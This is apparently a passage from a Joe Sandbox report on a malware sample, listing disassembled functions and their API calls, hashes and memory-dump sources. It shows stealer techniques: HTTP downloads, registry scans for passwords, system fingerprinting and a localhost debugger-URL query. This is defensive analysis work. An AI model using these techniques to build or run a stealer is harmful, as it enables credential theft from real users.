                                            • HeapAlloc.KERNEL32(00000000), ref: 00405021
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                            • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                            • InternetCloseHandle.WININET(+aA), ref: 00405109
                                            • InternetCloseHandle.WININET(?), ref: 00405116
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                            • String ID: +aA$+aA
                                            • API String ID: 3894370878-2425922966
                                            • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                            • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                            • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                            • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                            Function 02454B37 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02454BCC
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 02454BF1
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02454D71
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 0245509F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 024550BB
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 024550CF
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02455100
                                            • InternetCloseHandle.WININET(00000000), ref: 02455164
                                            • InternetCloseHandle.WININET(00000000), ref: 0245517C
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 02454DCC
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 02455186
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID:
                                            • API String ID: 2402878923-0
                                            • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction ID: d4e72ab636aea64e07c42ea81957ffae3da91ea5f14503e2321c6f84575ee302
                                            • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction Fuzzy Hash: 9F121F72941628AACB19EBA1DC59FFEB73AAF14701F50419EE14672090EF306F48CF52
                                            Function 02456537 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 02456598
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 024565BA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024565EC
                                            • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0245663C
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02456676
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02456688
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 024566B4
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02456724
                                            • InternetCloseHandle.WININET(00000000), ref: 024567A6
                                            • InternetCloseHandle.WININET(00000000), ref: 024567B0
                                            • InternetCloseHandle.WININET(00000000), ref: 024567BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID:
                                            • API String ID: 3074848878-0
                                            • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction ID: d22bc73f4399d038ccfd1d9808fc0aa5420b70640e5b95538633dc5917d019a9
                                            • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction Fuzzy Hash: 30713171A00628EBDB24DFA0DC48FEEB77AEF44701F50419AE50A6B190DBB56A84CF51
                                            Function 02469407 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02469463
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID:
                                            • API String ID: 2244384528-0
                                            • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction ID: b2140660ef03a57af2120ad5b82f589a485cfb47e3c705a2ddd05d56c361d0e2
                                            • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction Fuzzy Hash: E171FB75E05248ABDB04EFE4DC88FEEB77ABF48700F10854AF515A7290EB74A904CB61
                                            Function 02459E47 Relevance: 16.4, APIs: 13, Instructions: 141stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 02459CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 02459CD1
                                            • memset.MSVCRT ref: 02459E9A
                                            • lstrcat.KERNEL32(?,004212A8), ref: 02459EAF
                                            • lstrcat.KERNEL32(?,00000000), ref: 02459EC5
                                            • memset.MSVCRT ref: 02459F01
                                            • lstrcat.KERNEL32(?,004212BC), ref: 02459F16
                                            • lstrcat.KERNEL32(?,004212C4), ref: 02459F28
                                            • lstrcat.KERNEL32(?,?), ref: 02459F3C
                                            • lstrcat.KERNEL32(?,004212C8), ref: 02459F4E
                                            • lstrcat.KERNEL32(?,?), ref: 02459F62
                                            • lstrcat.KERNEL32(?,004212CC), ref: 02459F74
                                            • lstrlen.KERNEL32(00000000), ref: 02459F7E
                                            • lstrlen.KERNEL32(00000000), ref: 02459F8D
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • memset.MSVCRT ref: 02459FE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                            • String ID:
                                            • API String ID: 689835475-0
                                            • Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction ID: d9d9d6efbca5829148f53922f535555f175851b0ebf5625456c16b69271fbced
                                            • Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction Fuzzy Hash: 91516E71D00628ABCB14EBE0DC59FEE7739BF14302F80459EE506A6190EF759684CF61
                                            Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                            • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                            • API String ID: 3289985339-2144369209
                                            • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                            • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                            Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                              • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                              • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                              • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                              • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                              • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                            • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                            • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                            • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                            • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                            • task.LIBCPMTD ref: 0040775B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                            • String ID: :
                                            • API String ID: 3191641157-3653984579
                                            • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                            • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                            • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                            • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                            Function 02461862 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcpy.KERNEL32(?,?), ref: 02461892
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                              • Part of subcall function 02469657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,0245A1D8,00000000,006D6E5C,00000000), ref: 02469663
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024618CE
                                              • Part of subcall function 02469657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0245A1D8,00000000,006D6E5C), ref: 02469687
                                              • Part of subcall function 02469657: lstrlen.KERNEL32(00000000,?,0245A1D8,00000000,006D6E5C), ref: 0246969E
                                              • Part of subcall function 02469657: wsprintfA.USER32 ref: 024696BE
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461916
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0246195E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024619A5
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024619ED
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461A35
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461A7C
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461AC4
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                            • strtok_s.MSVCRT ref: 02461C07
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                            • String ID:
                                            • API String ID: 4276352425-0
                                            • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction ID: 39ece96ee1db59deeb3f89394c6d738774d8ad46f93c9b6195d644e20e1fb093
                                            • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction Fuzzy Hash: 157167B2D01218ABCB15EB61DC8CEFE777AAF54300F04459FE509A2140EE759B88CF62
                                            Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00407374
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                            • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                            • task.LIBCPMTD ref: 004075B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                            • String ID: Password
                                            • API String ID: 2698061284-3434357891
                                            • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                            • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                            Function 024678F7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02467939
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02467976
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024679FA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467A01
                                            • wsprintfA.USER32 ref: 02467A37
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 1544550907-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: a52983bcc70933fcff7083321af89792be10164f3f1b59b3d8bf5dfe33f99666
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: B24185B1D05258ABDB10DF94CC84BEEBBB5EF08704F00419AF50567280D7756B84CFA6
                                            Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009D03A8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,009D03A8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                            • __aulldiv.LIBCMT ref: 00418302
                                            • __aulldiv.LIBCMT ref: 00418310
                                            • wsprintfA.USER32 ref: 0041833C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                            • String ID: %d MB$@
                                            • API String ID: 2886426298-3474575989
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                            Function 024684F7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 02468527
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0246852E
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0246854F
                                            • __aulldiv.LIBCMT ref: 02468569
                                            • __aulldiv.LIBCMT ref: 02468577
                                            • wsprintfA.USER32 ref: 024685A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                            • String ID: @$pkm
                                            • API String ID: 2774356765-1350193380
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 7b25dac20d49e1c3466bb52f1e816ff6ab5f396408969a84448686ed5d49e786
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: F1214DB1E44358ABDB00DBD5CC49FBEBBB9FB44B04F10450AF615BB280D77859048BA6
                                            Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406197
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                            • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                            • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                            • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                            • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                            • Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                            • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                            Function 02456357 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
